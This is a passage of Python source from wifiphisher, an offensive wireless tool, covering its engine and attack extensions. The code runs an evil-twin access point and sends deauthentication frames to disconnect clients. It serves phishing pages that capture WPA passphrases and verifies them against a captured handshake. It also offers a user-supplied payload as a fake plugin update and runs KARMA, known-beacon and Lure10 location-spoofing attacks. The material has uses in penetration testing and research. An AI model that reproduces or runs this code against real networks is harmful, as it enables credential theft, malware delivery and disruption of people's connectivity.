new_mac)) except interfaces.InvalidMacAddressError as err: print(("[{0}!{1}] {2}").format(R, W, err)) # make sure interfaces are not blocked logger.info("Unblocking interfaces") self.network_manager.unblock_interface(ap_iface) self.network_manager.unblock_interface(mon_iface) # set monitor mode only when --essid is not given if self.opmode.extensions_enabled() or args.essid is None: self.network_manager.set_interface_mode(mon_iface, "monitor") except (interfaces.InvalidInterfaceError, interfaces.InterfaceCantBeFoundError, interfaces.InterfaceManagedByNetworkManagerError) as err: logging.exception("The following error has occurred:") print(("[{0}!{1}] {2}").format(R, W, err)) time.sleep(1) self.stop() if args.protectinterface: for interface in args.protectinterface: self.network_manager.nm_unmanage(interface) if not args.internetinterface and not args.keepnetworkmanager: kill_interfering_procs() logger.info("Killing all interfering processes") if self.opmode.internet_sharing_enabled(): self.fw.nat(ap_iface, args.internetinterface) set_ip_fwd() else: self.fw.redirect_requests_localhost() set_route_localnet() print('[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables') time.sleep(1) if args.essid: essid = args.essid channel = str(CHANNEL) # We don't have target attacking MAC in frenzy mode # That is we deauth all the 
BSSIDs that being sniffed target_ap_mac = None enctype = None else: # let user choose access point # start the monitor adapter self.network_manager.up_interface(mon_iface) ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher, self.network_manager, args) ap_sel_object = tui.TuiApSel() access_point = curses.wrapper(ap_sel_object.gather_info, ap_info_object) # if the user has chosen a access point continue # otherwise shutdown if access_point: # store choosen access point's information essid = access_point.name channel = access_point.channel target_ap_mac = access_point.mac_address enctype = access_point.encryption else: self.stop() # create a template manager object self.template_manager = phishingpage.TemplateManager(data_pages=args.phishing_pages_directory) # get the correct template tui_template_obj = tui.TuiTemplateSelection() template = tui_template_obj.gather_info(args.phishingscenario, self.template_manager) logger.info("Selecting {} template".format( template.get_display_name())) print("[" + G + "+" + W + "] Selecting " + template.get_display_name() + " template") # payload selection for browser plugin update if template.has_payload(): payload_path = args.payload_path # copy payload to update directory while not payload_path or not os.path.isfile(payload_path): # get payload path payload_path = eval(input( "[" + G + "+" + W + "] Enter the [" + G + "full path" + W + "] to the payload you wish to serve: ")) if not os.path.isfile(payload_path): print('[' + R + '-' + W + '] Invalid file path!') print('[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload ') template.update_payload_path(os.path.basename(payload_path)) copyfile(payload_path, self.template_manager.template_directory + template.get_payload_path()) APs_context = [] for i in APs: APs_context.append({ 'channel': APs[i][0] or "", 'essid': APs[i][1] or "", 'bssid': APs[i][2] or "", 'vendor': self.mac_matcher.get_vendor_name(APs[i][2]) or "" }) template.merge_context({'APs': APs_context}) # only get logo path if MAC address is present ap_logo_path = False if target_ap_mac is not None: ap_logo_path = template.use_file( self.mac_matcher.get_vendor_logo_path(target_ap_mac)) template.merge_context({ 'target_ap_channel': channel or "", 'target_ap_essid': args.phishing_essid or essid or "", 'target_ap_bssid': target_ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_vendor': self.mac_matcher.get_vendor_name(target_ap_mac) or "", 'target_ap_logo_path': ap_logo_path or "" }) # add wps_enable into the template context if args.wps_pbc: template.merge_context({'wps_pbc_attack': "1"}) else: template.merge_context({'wps_pbc_attack': "0"}) # We want to set this now for hostapd. Maybe the interface was in "monitor" # mode for network discovery before (e.g. when --noextensions is enabled). self.network_manager.set_interface_mode(ap_iface, "managed") # Start AP self.network_manager.up_interface(ap_iface) self.access_point.interface = ap_iface self.access_point.channel = channel self.access_point.essid = essid if args.force_hostapd: print('[' + T + '*' + W + '] Using hostapd instead of roguehostapd.' " Many significant features will be turned off." 
) self.access_point.force_hostapd = True if args.wpspbc_assoc_interface: wps_mac = self.network_manager.get_interface_mac( args.wpspbc_assoc_interface) self.access_point.deny_mac_addrs.append(wps_mac) if args.presharedkey: self.access_point.presharedkey = args.presharedkey if self.opmode.internet_sharing_enabled(): self.access_point.internet_interface = args.internetinterface print('[' + T + '*' + W + '] Starting the fake access point...') try: self.access_point.start(disable_karma=args.disable_karma) self.access_point.start_dhcp_dns() except BaseException as e: if hasattr(e, 'message'): print(e.message) else: print(e) self.stop() # Start Extension Manager (EM) # We need to start EM before we boot the web server if self.opmode.extensions_enabled(): shared_data = { 'is_freq_hop_allowed': self.opmode.freq_hopping_enabled(), 'target_ap_channel': channel or "", 'target_ap_essid': essid or "", 'target_ap_bssid': target_ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_logo_path': ap_logo_path or "", 'rogue_ap_essid': essid or "", 'rogue_ap_mac': self.network_manager.get_interface_mac(ap_iface), 'roguehostapd': self.access_point.hostapd_object, 'APs': APs_context, 'args': args } self.network_manager.up_interface(mon_iface) self.em.set_interface(mon_iface) extensions = DEFAULT_EXTENSIONS if args.lure10_exploit: extensions.append(LURE10_EXTENSION) if args.handshake_capture: extensions.append(HANDSHAKE_VALIDATE_EXTENSION) if args.nodeauth: extensions.remove(DEAUTH_EXTENSION) if args.wps_pbc: extensions.append(WPSPBC) if args.known_beacons: extensions.append(KNOWN_BEACONS_EXTENSION) if not args.force_hostapd: extensions.append(ROGUEHOSTAPDINFO) self.em.set_extensions(extensions) self.em.init_extensions(shared_data) self.em.start_extensions() # With configured DHCP, we may now start the web server if not self.opmode.internet_sharing_enabled(): # Start HTTP server in a background thread print('[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str( PORT) + ", " + str(SSL_PORT)) webserver = Thread( target=phishinghttp.runHTTPServer, args=(NETWORK_GW_IP, PORT, SSL_PORT, template, self.em)) webserver.daemon = True webserver.start() time.sleep(1.5) # We no longer need mac_matcher self.mac_matcher.unbind() clients_APs = [] APs = [] # Main loop. 
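# --------------------------------------------------------------------------
# Illustrative sketch, not part of the program flow above: the `shared_data`
# dict built earlier is handed to the extension manager, while the extensions
# further below read the same values through attribute access (for example
# `data.args` or `data.target_ap_essid`). The actual conversion presumably
# lives in wifiphisher.common.extensions and is not shown in this file; a
# minimal stand-in for the idea could be:
from collections import namedtuple

def to_shared_data(shared_dict):
    """Expose a plain dict's keys as read-only attributes."""
    SharedData = namedtuple("SharedData", sorted(shared_dict.keys()))
    return SharedData(**shared_dict)

# Example (hypothetical values):
#     shared = to_shared_data({"target_ap_essid": "FreeWiFi",
#                              "target_ap_channel": "6"})
#     shared.target_ap_essid  # -> "FreeWiFi"
# --------------------------------------------------------------------------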
try: main_info = tui.MainInfo(VERSION, essid, channel, ap_iface, self.em, phishinghttp, args) tui_main_object = tui.TuiMain() curses.wrapper(tui_main_object.gather_info, main_info) self.stop() except KeyboardInterrupt: self.stop() def run(): try: engine = WifiphisherEngine() engine.start() except KeyboardInterrupt: print(R + '\n (^C)' + O + ' interrupted\n' + W) engine.stop() except EOFError: print(R + '\n (^D)' + O + ' interrupted\n' + W) File: wifiphisher/extensions/__init__.py File: wifiphisher/extensions/handshakeverify.py # pylint: skip-file """ Extension that verifies WPA key by precaptured handshake using cowpatty """ import subprocess from collections import defaultdict import shlex import wifiphisher.common.extensions as extensions def get_process_result(command_string): command = shlex.split(command_string) process = subprocess.Popen(command, stdout=subprocess.PIPE, universal_newlines=True) output = "" while True: output += process.stdout.readline().strip() code = process.poll() if code is not None: for lines in process.stdout.readlines(): output += lines.strip() break return output def is_valid_handshake_capture(filename): command = '/bin/cowpatty -c -r {}'.format(filename) output = get_process_result(command) return ("Collected all necessary data" in output) class Handshakeverify(object): def __init__(self, data): self.capt_file = data.args.handshake_capture self.essid = data.target_ap_essid self.key_file_path = "/tmp/keyfile.tmp" self.key = "" self.found = False def send_channels(self): return [] def get_packet(self, packet): return defaultdict(list) def send_output(self): if self.key != "" and self.found: return ["VALID KEY: " + self.key] elif self.key != "" and not self.found: return ["INVALID KEY ({})".format(self.key)] return ["WAITING FOR WPA KEY POST (ESSID: {})".format(self.essid)] def on_exit(self): pass @extensions.register_backend_funcs def psk_verify(self, *list_data): self.key = list_data[0] keyfile = open(self.key_file_path, "w") keyfile.write(self.key + "\n") keyfile.close() command = '/bin/cowpatty -f "{}" -r "{}" -s "{}"'.format(self.key_file_path, self.capt_file, self.essid) self.found = False output = get_process_result(command) if "The PSK is" in output: self.found = True if self.key != "" and self.found: return 'success' elif self.key != "" and not self.found: return 'fail' return 'unknown' File: wifiphisher/extensions/deauth.py """ Extension that sends 3 DEAUTH/DISAS Frames: 1 from the AP to the client 1 from the client to the AP 1 to the broadcast address """ import logging from collections import defaultdict import scapy.layers.dot11 as dot11 import wifiphisher.common.constants as constants import wifiphisher.common.globals as universal logger = logging.getLogger(__name__) def is_deauth_frame(packet): """ Determine if the sending frame is deauth frame :param packet: A scapy.layers.RadioTap object :type packet: scapy.layers.RadioTap :return: True if the frame is belonged to deauth module :rtype: bool """ if packet.subtype == 10 or packet.subtype == 12: return True return False class Deauth(object): """ Handles all the deauthentication process. """ def __init__(self, data): """ Setup the class with all the given arguments. 
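A rough sketch of how the extension manager is expected to drive this
extension (the loop below is illustrative only; `sniffed_packet` and
`inject` are hypothetical names, not part of wifiphisher's API)::

    deauth = Deauth(shared_data)
    frames_per_channel = deauth.get_packet(sniffed_packet)
    for channel in deauth.send_channels():
        for frame in frames_per_channel.get(channel, []):
            inject(frame)               # e.g. scapy sendp on that channel
    print(deauth.send_output())         # status lines for the UI
    deauth.on_exit()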
:param self: A Deauth object :param data: Shared data from main engine :type self: Deauth :type data: tuple :return: None :rtype: None """ self._observed_clients = set() self._should_continue = True self._data = data # the bssids having the same ESSID self._deauth_bssids = dict() # channel mapping to the frames list self._packets_to_send = defaultdict(list) @staticmethod def _craft_packet(sender, receiver, bssid): """ Return a list with disassociation packet followed by a deauthentication packet :param sender: The MAC address of the sender :param receiver: The MAC address of the receiver :param bssid: The MAC address of the AccessPoint :type sender: str :type receiver: str :type bssid: str :return: list :rtype: A list with disassociation followed by deauthentication packet """ # craft disassociation packet disassoc_part = dot11.Dot11( type=0, subtype=10, addr1=receiver, addr2=sender, addr3=bssid) disassoc_packet = ( dot11.RadioTap() / disassoc_part / dot11.Dot11Disas()) # craft deauthentication packet deauth_part = dot11.Dot11( type=0, subtype=12, addr1=receiver, addr2=sender, addr3=bssid) deauth_packet = (dot11.RadioTap() / deauth_part / dot11.Dot11Deauth()) return [disassoc_packet, deauth_packet] @staticmethod def _extract_bssid(packet): """ Return the bssid of access point based on the packet type :param packet: A scapy.layers.RadioTap object :type packet: scapy.layers.RadioTap :return: bssid or None if it is WDS :rtype: str or None .. note: 0 0 -> IBBS 0 1 -> from AP 1 0 -> to AP """ ds_value = packet.FCfield & 3 to_ds = ds_value & 0x1 != 0 from_ds = ds_value & 0x2 != 0 # return the correct bssid based on the type return ((not to_ds and not from_ds and packet.addr3) or (not to_ds and from_ds and packet.addr2) or (to_ds and not from_ds and packet.addr1) or None) def _is_target(self, packet): """ Check if this is the target attacking bssid :param self: A Deauth object :param packet: A scapy.layers.RadioTap object :type self: Deauth :type packet: scapy.layers.RadioTap :return: True if this is the target attacking bssid else False :rtype: bool """ if (packet.addr3 != self._data.rogue_ap_mac and packet.addr3 not in self._deauth_bssids): try: essid = packet[dot11.Dot11Elt].info.decode("utf8") except UnicodeDecodeError: logger.warning("Unable to decode the essid with with bssid %s", packet.addr3) return False # only compare essid when -dE is given return ((self._data.args.deauth_essid and essid == self._data.args.deauth_essid) or # frenzy deauth (not self._data.args.deauth_essid and not self._data.target_ap_bssid) or # target_ap_bssid without -dE option (not self._data.args.deauth_essid and self._data.target_ap_bssid == packet.addr3) or False) def get_packet(self, packet): """ Process the Dot11 packets and add any desired clients to observed_clients. 
:param self: A Deauth object :param packet: A scapy.layers.RadioTap object :type self: Deauth :type packet: scapy.layers.RadioTap :return: A tuple with channel list followed by packets list :rtype: tuple """ packets_to_send = list() # basic malformed frame check try: # Discard WDS frame ds_value = packet.FCfield & 3 if ds_value == 3: return self._packets_to_send receiver = packet.addr1 sender = packet.addr2 except AttributeError: logger.debug("Malformed frame doesn't contain address fields") return self._packets_to_send # obtain the channel for this packet try: # channel is in the third IE of Dot11Elt channel = ord(packet[dot11.Dot11Elt][2].info) # check if this is valid channel if channel not in universal.ALL_2G_CHANNELS: return self._packets_to_send except (TypeError, IndexError): # just return empty channel and packet logger.debug("Malformed frame doesn't contain channel field") return self._packets_to_send bssid = self._extract_bssid(packet) # check beacon if this is our target deauthing BSSID if (packet.haslayer(dot11.Dot11Beacon) and bssid not in self._deauth_bssids and self._is_target(packet)): # listen beacon to get the target attacking BSSIDs for the # specified ESSID packets_to_send += self._craft_packet(bssid, constants.WIFI_BROADCAST, bssid) logger.info("Target deauth BSSID found: %s", bssid) # remember the channel of the given bssid self._deauth_bssids[bssid] = str(channel) elif bssid in self._deauth_bssids: # the bssid is already in the deauth set and we need to check # if the channel of the target AP has been changed if str(channel) != self._deauth_bssids[bssid]: logger.info("BSSID: %s changes channel to %d", bssid, channel) self._update_target_ap_frames(str(channel), str(self._deauth_bssids[bssid]), bssid) if bssid not in self._deauth_bssids: return self._packets_to_send clients = self._add_clients(sender, receiver, bssid) if clients: self._observed_clients.add(clients[0]) packets_to_send += clients[1] logger.info("Client with BSSID %s is now getting deauthenticated", clients[0]) self._packets_to_send[str(channel)] += packets_to_send return self._packets_to_send def _update_target_ap_frames(self, new_channel, old_channel, bssid): """ :param self: A Deauth object :param new_channel: New channel for the target AP :param old_channel: Old channel for the target AP :type self: Deauth :param bssid: Address of the bssid :type new_channel: str :type old_channel: str :type bssid: str :return: None :rtype: None """ old_channel_list = [] new_channel_list = [] for pkt in self._packets_to_send[old_channel]: if pkt.addr3 != bssid: old_channel_list.append(pkt) else: new_channel_list.append(pkt) self._packets_to_send[old_channel] = old_channel_list # append the frames of target AP to the new channel self._packets_to_send[new_channel].extend(new_channel_list) # update the channel of bssid self._deauth_bssids[bssid] = new_channel def _add_clients(self, sender, receiver, bssid): """ Return a tuple containing client followed by packets if the given packet is valid and return None otherwise :param self: A Deauth object :param sender: Address of the sender :param receiver: Address of the receiver :param bssid: Address of the bssid :type self: Deauth :type sender: str :type receiver: str :type bssid: str :return: (client: str, packets: list) or None :rtype: tuple or None """ # addresses that are not acceptable non_valid_addresses = constants.NON_CLIENT_ADDRESSES.union( self._observed_clients) # craft the packets packets = lambda: (self._craft_packet(receiver, sender, bssid) + 
self._craft_packet(sender, receiver, bssid)) # return the client and packets if valid and None otherwise # it uses short circuiting to improve performance return (sender not in non_valid_addresses and receiver not in non_valid_addresses and (sender == bssid and (receiver, packets()) or receiver == bssid and (sender, packets())) or None) def send_output(self): """ Get any relevant output message :param self: A Deauth object :type self: Deauth :return: A list with all the message entries :rtype: list """ return list(map("DEAUTH/DISAS - {}".format, self._observed_clients)) def send_channels(self): """ Send channes to subscribe :param self: A Deauth object :type self: Deauth :return: A list with all interested channels :rtype: list """ # we cannot do frequency hopping if users have only one card if not self._data.is_freq_hop_allowed: return [self._data.target_ap_channel] if self._data.target_ap_bssid and not self._data.args.deauth_essid\ and not self._data.args.channel_monitor: return [self._data.target_ap_channel] if self._data.args.deauth_channels and \ len(self._data.args.deauth_channels) > 0: return list(map(str, self._data.args.deauth_channels)) return list(map(str, universal.ALL_2G_CHANNELS)) def on_exit(self): """ Free all the resources regarding to this module :param self: A Deauth object :type self: Deauth :return: None :rtype: None """ pass File: wifiphisher/extensions/wpspbc.py """ Extension that sniffs if there is change for WPS PBC exploitation Define three WPS states 1) WPS_IDLE: Wait for target AP bringing WPSPBC IE in the beacon 2) WPS_CONNECTING: If users specify the WPS association interface we can start using wpa_supplicant/wpa_cli to connect to the AP 3) WPS_CONNECTED: We have connected to the AP """ import logging import os import signal import subprocess import time from collections import defaultdict from threading import Timer import scapy.layers.dot11 as dot11 import wifiphisher.common.extensions as extensions logger = logging.getLogger(__name__) WPS_IDLE, WPS_CONNECTING, WPS_CONNECTED = list(range(3)) # wait 3 seconds to give the wps state to the phishinghttp module WAIT_CNT = 3 # define the enum to string marco WPS_2_STR = { WPS_IDLE: "WPS_IDLE", WPS_CONNECTING: "WPS_CONNECTING", WPS_CONNECTED: "WPS_CONNECTED" } def kill_wpa_supplicant(): """ Kill the wpa_supplicant :return: None :rtype: None """ proc = subprocess.Popen(['ps', '-A'], stdout=subprocess.PIPE) output = proc.communicate()[0] # total processes in the system sys_procs = output.splitlines() for proc in sys_procs: if 'wpa_supplicant' in proc: pid = int(proc.split(None, 1)[0]) os.kill(pid, signal.SIGKILL) class Wpspbc(object): """ Handle the wps exploitation process """ def __init__(self, data): """ Setup the class with all the given arguments. 
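An illustrative summary of the state machine, based on wps_state_handler()
and wps_timeout_handler() below::

    WPS_IDLE        --beacon of target AP carries the WPS PBC IE--> WPS_CONNECTING
    WPS_CONNECTING  --wpa_cli reports association (COMPLETED)-----> WPS_CONNECTED
    WPS_CONNECTING  --120s walk time expires without association--> WPS_IDLE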
:param self: A Wpspbc object :param data: Shared data from main engine :type self: Deauth :type data: tuple :return: None :rtype: None """ self._data = data self._packets_to_send = defaultdict(list) self._wps_state = WPS_IDLE # to prevent lunch wpa_supplicant multiple times self._is_supplicant_running = False # wps walk time timer self._wps_timer = Timer(120.0, self.wps_timeout_handler) def wps_timeout_handler(self): """ Handle if state is not in CONNECTED after the 2MIN walk time :param self: A Wpspbc object :type self: Wpspbc :return: None :rtype: None """ if self.get_wps_state() != WPS_CONNECTED: self.set_wps_state(WPS_IDLE) extensions.is_deauth_cont = True if self._is_supplicant_running: kill_wpa_supplicant() self._is_supplicant_running = False @staticmethod def does_have_wpspbc_ie(packet): """ Check if the pbc button is being pressed :param self: A Wpspbc object :param packet: A scapy.layers.RadioTap object :type self: Wpspbc :type packet: scapy.layers.RadioTap :return: None :rtype: None """ elt_section = packet[dot11.Dot11Elt] while isinstance(elt_section, dot11.Dot11Elt): # check if WPS IE exists if elt_section.ID == 221 and\ elt_section.info.startswith("\x00P\xf2\x04"): # strip the starting 4 bytes wps_ie_array = [ord(val) for val in elt_section.info[4:]] pos = 0 # start looping to find the WPS PBC IE while pos < len(wps_ie_array): if wps_ie_array[pos] == 0x10 and wps_ie_array[pos + 1] == 0x12: return True else: data_len = ( wps_ie_array[pos + 2] << 8) + wps_ie_array[pos + 3] # jump to the next data element by adding # the len of type/length/data pos += (2 + 2 + data_len) break elt_section = elt_section.payload return False def get_wps_state(self): """ Get the current wps state :param self: A Wpspbc object :type self: Wpspbc :return: An intger represented the WPS state :rtype: int """ return self._wps_state def set_wps_state(self, new_state): """ Set the wps state :param self: A Wpspbc object :type self: Wpspbc :return: None :rtype: None """ logger.info("wps state is transiting from %s to %s",\ WPS_2_STR[self.get_wps_state()], WPS_2_STR[new_state]) self._wps_state = new_state def is_associated(self): """ Using wpa_cli to check if the wps interface is getting associated :param self: A Wpspbc object :type self: Wpspbc :return: True if the interface is connected else False :rtype: bool """ proc = subprocess.Popen(['wpa_cli', 'status'], stdout=subprocess.PIPE) output = proc.communicate()[0] # not only check the state is in COMPLETED but also needs to check # if we have associated to our own rogueap if the target AP is being # shut down (i.e. 
supplicant will connect to the OPEN rogue AP if the # target AP is OPEN) if 'COMPLETED' in output and self._data.rogue_ap_mac not in output: return True return False def wps_associate(self): """ Using wpa_supplicant and wpa_cli to associate to the target WPS Access Point :param self: A Wpspbc object :type self: Wpspbc :return: None :rtype: None """ if not self._is_supplicant_running: self._is_supplicant_running = True with open("/tmp/wpa_supplicant.conf", 'w') as conf: conf.write("ctrl_interface=/var/run/wpa_supplicant\n") try: proc = subprocess.Popen( [ 'wpa_supplicant', '-i' + self._data.args.wpspbc_assoc_interface, '-Dnl80211', '-c/tmp/wpa_supplicant.conf' ], stdout=subprocess.PIPE) time.sleep(2) if proc.poll() is not None: logger.error("supplicant lunches fail!!") proc = subprocess.Popen( ['wpa_cli', 'wps_pbc'], stdout=subprocess.PIPE) output = proc.communicate()[0] if 'OK' not in output: logger.error( "CONFIG_WPS should be ENABLED when compile wpa_supplicant!!" ) kill_wpa_supplicant() else: logger.info( "Start using wpa_supplicant to connect to WPS AccessPoint" ) self._wps_timer = Timer(120.0, self.wps_timeout_handler) self._wps_timer.start() except OSError: logger.error("wpa_supplicant or wpa_cli are not installed!") def wps_state_handler(self, packet): """ Handler for wps state transition :param self: A Wpspbc object :param packet: A scapy.layers.RadioTap object :type self: Wpspbc :type packet: scapy.layers.RadioTap :return: None :rtype: None """ # check if the frame has wps pbc IE if packet.haslayer(dot11.Dot11Beacon) and\ packet.addr3 == self._data.target_ap_bssid: has_pbc = self.does_have_wpspbc_ie(packet) if self.get_wps_state() == WPS_IDLE: if has_pbc: extensions.is_deauth_cont = False self.set_wps_state(WPS_CONNECTING) elif self.get_wps_state() == WPS_CONNECTING: # if we didn't connect to the WPS in the 2MIN walk time if not has_pbc and not self._wps_timer.is_alive(): self.set_wps_state(WPS_IDLE) # start deauthing again extensions.is_deauth_cont = True # if users specify the wps association interface we start # the automatic association here else: if self._data.args.wpspbc_assoc_interface: self.wps_associate() if self._is_supplicant_running: is_assoc = self.is_associated() # if state is not CONNECTED and timer is not running if not is_assoc and not self._wps_timer.is_alive(): self.set_wps_state(WPS_IDLE) extensions.is_deauth_cont = True self._is_supplicant_running = False kill_wpa_supplicant() elif self.get_wps_state() == WPS_CONNECTING: if is_assoc: self.set_wps_state(WPS_CONNECTED) # stop the walk time timer if self._wps_timer.is_alive(): self._wps_timer.cancel() def get_packet(self, packet): """ Process the Dot11 packets :param self: A Wpspbc object :param packet: A scapy.layers.RadioTap object :type self: Deauth :type packet: scapy.layers.RadioTap :return: A tuple with channel list followed by packets list :rtype: tuple """ try: bssid = packet.addr3 except AttributeError: logger.debug("Malformed frame doesn't contain address fields") return self._packets_to_send self.wps_state_handler(packet) return self._packets_to_send def send_output(self): """ Get any relevant output message :param self: A Wpspbc object :type self: Wpspbc :return: A list with all the message entries :rtype: list """ if self.get_wps_state() == WPS_CONNECTED: return ["WPS PBC CONNECTED!"] elif self.get_wps_state() == WPS_CONNECTING: return ["WPS PBC button is being pressed for the target AP!"] return [""] def send_channels(self): """ Send channes to subscribe :param self: A Wpspbc object :type self: 
Wpspbc :return: A list with all interested channels :rtype: list """ return [self._data.target_ap_channel] @extensions.register_backend_funcs def get_wps_state_handler(self, *list_data): """ Backend method for getting the WPS state :param self: A Wpspbc object :type self: Wpspbc :return: A string representing the WPS state :rtype: string """ cnt = 0 # wait maximum 3 seconds to return the wps state while cnt < WAIT_CNT: if self._wps_state != WPS_IDLE: return WPS_2_STR[self._wps_state] cnt += 1 time.sleep(1) return WPS_2_STR[self._wps_state] def on_exit(self): """ Free all the resources regarding to this module :param self: A Wpspbc object :type self: Wpspbc :return: None :rtype: None """ self.set_wps_state(WPS_IDLE) if os.path.isfile('/tmp/wpa_supplicant.conf'): os.remove('/tmp/wpa_supplicant.conf') if self._is_supplicant_running: kill_wpa_supplicant() File: wifiphisher/extensions/lure10.py """ Extension that implements the Lure10 attack. Exploits the Wi-Fi Sense feature and will result to automatic association by fooling the Windows Location Service """ import logging from collections import defaultdict import scapy.layers.dot11 as dot11 import wifiphisher.common.constants as constants logger = logging.getLogger(__name__) class Lure10(object): """ Sends a number of beacons to fool Windows Location Service """ def __init__(self, shared_data): """ Setup the class with all the given arguments :param self: A Lure10 object :param data: Shared data from main engine :type self: Lure10 :type data: dict :return: None :rtype: None """ self.first_run = True self.data = shared_data # store channel to frame list self._packets_to_send = defaultdict(list) def get_packet(self, pkt): """ We start broadcasting the beacons on the first received packet :param self: A Lure10 object :param packet: A scapy.layers.RadioTap object :type self: Lure10 :type packet: scapy.layers.RadioTap :return: A tuple containing ["*"] followed by a list of the crafted beacon frames :rtype: tuple(list, list) .. warning: pkt is not used here but should not be removed since this prototype is requirement """ beacons = list() bssid = str() # initiliate the _packets_to_send in first run if self.first_run: self._packets_to_send["*"] = beacons # only run this code once if self.first_run and self.data.args.lure10_exploit: # locate the lure10 file area_file = constants.LOCS_DIR + self.data.args.lure10_exploit with open(area_file) as _file: for line in _file: # remove any white space and store the BSSD (first word) line.strip() bssid = line.split(" ", 1)[0] # craft the required packet parts frame_part_0 = dot11.RadioTap() frame_part_1 = dot11.Dot11( subtype=8, addr1=constants.WIFI_BROADCAST, addr2=bssid, addr3=bssid) frame_part_2 = dot11.Dot11Beacon(cap=0x2105) frame_part_3 = dot11.Dot11Elt(ID="SSID", info="") frame_part_4 = dot11.Dot11Elt( ID="Rates", info=constants.AP_RATES) frame_part_5 = dot11.Dot11Elt(ID="DSset", info=chr(7)) # create a complete packet by combining the parts complete_frame = ( frame_part_0 / frame_part_1 / frame_part_2 / frame_part_3 / frame_part_4 / frame_part_5) logger.debug("Add lure10-beacon frame with BSSID %s", bssid) # add the frame to the list beacons.append(complete_frame) # make sure this block is never executed again and the notification occurs self.first_run = False self._packets_to_send["*"] = beacons return self._packets_to_send def send_output(self): """ Sending Lure10 notification :param self: A Lure10 object :type self: Lure10 :return: list of notification messages :rtype: list .. 
note: Only sends notification for the first time to reduce clutters """ return (not self.first_run and self.data.args.lure10_exploit and ["Lure10 - Spoofing location services"] or []) def send_channels(self): """ Send all interested channels :param self: A Lure10 object :type self: Lure10 :return: A list with all the channels interested :rtype: list .. note: Only the channel of the target AP is sent here """ return [self.data.target_ap_channel] def on_exit(self): """ :param self: A Lure10 object :type self: Lure10 Free all the resources regarding to this module :return: None :rtype: None """ pass File: wifiphisher/extensions/roguehostapdinfo.py """ Extension that interacts with roguehostapd to print relevant information. For example, information regarding automatic association attacks. """ from collections import defaultdict import wifiphisher.common.constants as constants class Roguehostapdinfo(object): """ Handles for printing KARMA attack information """ def __init__(self, data): """ Setup the class with all the given arguments. :param self: A roguehostapdinfo object. :param data: Shared data from main engine :type self: roguehostapdinfo :type data: dictionary :return: None :rtype: None """ self._data = data self._packets_to_send = defaultdict(list) self._mac2ssid_dict = defaultdict() self._known_beacon_ssids = self._get_known_beacon_ssids() def get_packet(self, packet): """ :param self: A roguehostapdinfo object :param packet: A scapy.layers.RadioTap object :type self: roguehostapdinfo :type packet: scapy.layers.RadioTap :return: empty list :rtype: list """ return self._packets_to_send def _get_known_beacon_ssids(self): """ :param self: A roguehostapdinfo object :type self: roguehostapdinfo :return: None :rtype: None """ known_beacons_ssids = set() # locate the known WLANS file if self._data.args.known_beacons: area_file = constants.KNOWN_WLANS_FILE with open(area_file) as _file: for line in _file: if line.startswith("!"): continue essid = line.rstrip() known_beacons_ssids.add(essid) return known_beacons_ssids def send_output(self): """ Send the output the extension manager :param self: A roguehostapdinfo object. :type self: roguehostapdinfo :return: A list with the password checking information :rtype: list ..note: In each packet we ask roguehostapd whether there are victims associated to rogue AP """ info = [] ssid_mac_list = self._data.roguehostapd.get_karma_data() try: mac_list, ssid_list = list(zip(*ssid_mac_list)) except ValueError: # incase ssid_mac_list is still empty mac_list = [] ssid_list = [] # remove the one not in the current associated list pop_macs = [] for mac in self._mac2ssid_dict: if mac not in mac_list: pop_macs.append(mac) for key in pop_macs: self._mac2ssid_dict.pop(key) # add new associated victims to the dictionary for idx, mac in enumerate(mac_list): if mac not in self._mac2ssid_dict: self._mac2ssid_dict[mac] = ssid_list[idx] macssid_pairs = list(self._mac2ssid_dict.items()) for mac, ssid in macssid_pairs: if ssid == self._data.target_ap_essid: outputstr = "Victim " + mac + " probed for WLAN with ESSID: '" + ssid + "' (Evil Twin)" elif ssid not in self._known_beacon_ssids: outputstr = "Victim " + mac + " probed for WLAN with ESSID: '" + ssid + "' (KARMA)" else: outputstr = "Victim " + mac + " probed for WLAN with ESSID: '" + ssid + "' (Known Beacons)" info.append(outputstr) return info def send_channels(self): """ Send channels to subscribe :param self: A roguehostapdinfo object. 
:type self: roguehostapdinfo :return: empty list :rtype: list ..note: we don't need to send frames in this extension """ return [self._data.target_ap_channel] def on_exit(self): """ Free all the resources regarding to this module :param self: A roguehostapdinfo object. :type self: roguehostapdinfo :return: None :rtype: None """ pass File: wifiphisher/extensions/knownbeacons.py """ Extension that sends a number of known beacons to trigger the AUTO-CONNECT flag. """ import logging import time from collections import defaultdict import scapy.layers.dot11 as dot11 import wifiphisher.common.constants as constants import wifiphisher.common.globals as universal logger = logging.getLogger(__name__) class Knownbeacons(object): """ Sends a number of known beacons to trigger the Auto-Connect flag. """ def __init__(self, shared_data): """ Setup the class with all the given arguments :param self: A Beacons object :param data: Shared data from main engine :type self: Beacons :type data: dict :return: None :rtype: None """ self.data = shared_data # store channel to frame list self._packets_to_send = defaultdict(list) self._starttime = time.time() self._msg = [] self._full_pkt_list = self._get_known_beacons() def _get_known_beacons(self): """ Retrieve the popular ESSIDs from the text file and then construct all the known beacon frames. :param self: A Beacons object :type self: Beacons :return: A list with all the beacon frames :rtype: list """ beacons = list() essid = str() bssid = self.data.rogue_ap_mac # locate the known WLANS file area_file = constants.KNOWN_WLANS_FILE with open(area_file) as _file: for line in _file: if line.startswith("!"): continue essid = line.rstrip() # craft the required packet parts frame_part_0 = dot11.RadioTap() frame_part_1 = dot11.Dot11( subtype=8, addr1=constants.WIFI_BROADCAST, addr2=bssid, addr3=bssid) frame_part_2 = dot11.Dot11Beacon(cap=constants.KB_BEACON_CAP) frame_part_3 = dot11.Dot11Elt(ID="SSID", info=essid) frame_part_4 = dot11.Dot11Elt( ID="Rates", info=constants.AP_RATES) frame_part_5 = dot11.Dot11Elt(ID="DSset", info=chr(7)) # create a complete packet by combining the parts complete_frame = ( frame_part_0 / frame_part_1 / frame_part_2 / frame_part_3 / frame_part_4 / frame_part_5) # add the frame to the list beacons.append(complete_frame) return beacons def get_packet(self, pkt): """ We start broadcasting the beacons on the first received packet :param self: A Knownbeacons object :param packet: A scapy.layers.RadioTap object :type self: Knownbeacons :type packet: scapy.layers.RadioTap :return: A tuple containing ["*"] followed by a list of the crafted beacon frames :rtype: tuple(list, list) .. warning: pkt is not used here but should not be removed since this prototype is requirement """ # If INTERVAL seconds 